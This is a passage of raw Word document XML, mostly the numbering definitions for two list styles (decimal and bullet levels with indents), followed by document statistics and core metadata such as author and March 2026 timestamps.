      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA4A4F9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="891C672C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9C26CFFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2DDC94F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CF6A8E38">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A2CAB1E2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D3A4DF4A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A5EAAE1A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F5D2159"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06763D04"/>
    <w:lvl w:ilvl="0" w:tplc="34643022">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CFD003BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="45D2FC94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="59EC14B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="12D49DF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A32EBF36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2BC8DF8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F0A0D564">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1CD8FBA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="6184930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859"/>
    <w:rsid w:val="000F7397"/>
    <w:rsid w:val="00633A7D"/>
    <w:rsid w:val="00972170"/>
    <w:rsid w:val="00E0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BE65C3"/>
  <w15:docId w15:val="{37BAD7F2-7CD7-3F47-8717-B0A332BFE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24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pPr>
      <w:spacing w:before="0" w:after="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2243</Words>
  <Characters>12926</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>349</Lines>
  <Paragraphs>316</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14853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Brandon Bassett</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T14:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T14:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>